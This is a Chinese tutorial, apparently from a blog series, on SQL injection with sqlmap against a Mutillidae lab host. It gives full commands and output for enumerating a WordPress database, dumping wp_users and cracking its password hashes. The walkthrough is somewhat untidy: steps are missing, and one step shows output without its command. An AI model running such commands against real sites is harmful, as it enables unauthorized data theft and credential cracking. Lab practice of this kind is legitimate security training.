SQLmap 注入-03 获得用户信息

news2025/1/23 9:07:26

1: Sqlmap 先进入库，然后进入table, 然后列出column:

sqlmap -u "http://192.168.56.133/mutillidae/index.php?page=user-info.php&username=xiaosheng&password=abc&user-info-php-submit-button=View+Account+Details" --batch -p username -D wordpress --tables

看一下执行结果:

[06:43:34] [INFO] the back-end DBMS is MySQL

web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)

web application technology: PHP 5.3.2, Apache 2.2.14, PHP

back-end DBMS: MySQL >= 5.0

[06:43:34] [INFO] fetching tables for database: 'wordpress'

[06:43:36] [WARNING] reflective value(s) found and filtering out

Database: wordpress

[14 tables]

+-------------------+

| wp_categories |

| wp_comments |

| wp_linkcategories |

| wp_links |

| wp_mygallery |

| wp_mygprelation |

| wp_mypictures |

| wp_options |

| wp_post2cat |

| wp_postmeta |

| wp_posts |

| wp_spreadsheet |

| wp_usermeta |

| wp_users |

+-------------------+

[06:43:38] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.56.133'

[06:43:38] [WARNING] your sqlmap version is outdated

[*] ending @ 06:43:38 /2025-01-21/

下面进一步列出表的信息:

sqlmap -u "http://192.168.56.133/mutillidae/index.php?page=user-info.php&username=xiaosheng&password=abc&user-info-php-submit-button=View+Account+Details" --batch -p username -D wordpress -T wp_users -columns

[06:47:03] [INFO] the back-end DBMS is MySQL

web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)

web application technology: Apache 2.2.14, PHP, PHP 5.3.2

back-end DBMS: MySQL >= 5.0

[06:47:03] [INFO] fetching columns for table 'wp_users' in database 'wordpress'

[06:47:05] [WARNING] reflective value(s) found and filtering out

Database: wordpress

Table: wp_users

[10 columns]

+---------------------+---------------------+

| Column | Type |

+---------------------+---------------------+

| display_name | varchar(250) |

| ID | bigint(20) unsigned |

| user_activation_key | varchar(60) |

| user_email | varchar(100) |

| user_login | varchar(60) |

| user_nicename | varchar(50) |

| user_pass | varchar(64) |

| user_registered | datetime |

| user_status | int(11) |

| user_url | varchar(100) |

+---------------------+---------------------+

[06:47:06] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.56.133'

[06:47:06] [WARNING] your sqlmap version is outdated

[*] ending @ 06:47:06 /2025-01-21/

3: 下面知道某个表的信息后，那么就要把里面的数据dump 下来，要用dump-all:

┌──(root㉿kali)-[~]

└─# sqlmap -u "http://192.168.56.133/mutillidae/index.php?page=user-info.php&username=xiaosheng&password=abc&user-info-php-submit-button=View+Account+Details" --batch -p username -D wordpress -T wp_users -dump

---

下面是输出结果:

[06:52:58] [INFO] the back-end DBMS is MySQL

web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)

web application technology: PHP 5.3.2, Apache 2.2.14, PHP

back-end DBMS: MySQL >= 5.0

[06:52:58] [INFO] fetching columns for table 'wp_users' in database 'wordpress'

[06:52:59] [WARNING] reflective value(s) found and filtering out

[06:52:59] [INFO] fetching entries for table 'wp_users' in database 'wordpress'

[06:53:02] [INFO] recognized possible password hashes in columns 'user_pass, user_activation_key'

do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] N

do you want to crack them via a dictionary-based attack? [Y/n/q] Y

[06:53:02] [INFO] using hash method 'md5_generic_passwd'

what dictionary do you want to use?

[1] default dictionary file '/usr/share/sqlmap/data/txt/wordlist.tx_' (press Enter)

[2] custom dictionary file

[3] file with list of dictionary files

> 1

[06:53:02] [INFO] using default dictionary

do you want to use common password suffixes? (slow!) [y/N] N

[06:53:02] [INFO] starting dictionary-based cracking (md5_generic_passwd)

[06:53:02] [INFO] starting 4 processes

[06:53:07] [INFO] cracked password 'admin' for user 'admin'

[06:53:14] [INFO] cracked password 'user' for user 'user'

[06:53:14] [INFO] cracked password 'admin' for user 'admin'

[06:53:16] [INFO] cracked password 'user' for user 'user'

Database: wordpress

Table: wp_users

[2 entries]

+----+----------+------------------------------------------+-------------------+------------+-------------+--------------+---------------+---------------------+----------------------------------+

+----+----------+------------------------------------------+-------------------+------------+-------------+--------------+---------------+---------------------+----------------------------------+

+----+----------+------------------------------------------+-------------------+------------+-------------+--------------+---------------+---------------------+----------------------------------+

[06:53:21] [INFO] table 'wordpress.wp_users' dumped to CSV file '/root/.local/share/sqlmap/output/192.168.56.133/dump/wordpress/wp_users.csv'

[06:53:21] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.56.133'

[06:53:21] [WARNING] your sqlmap version is outdated

4下面获得数据库的信息:

[07:03:41] [INFO] the back-end DBMS is MySQL

web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)

web application technology: PHP 5.3.2, Apache 2.2.14, PHP

back-end DBMS: MySQL >= 5.0

[07:03:41] [INFO] fetching entries of column(s) 'user_login,user_pass' for table 'wp_users' in database 'wordpress'

[07:03:43] [WARNING] reflective value(s) found and filtering out

[07:03:44] [INFO] recognized possible password hashes in column 'user_pass'

do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] N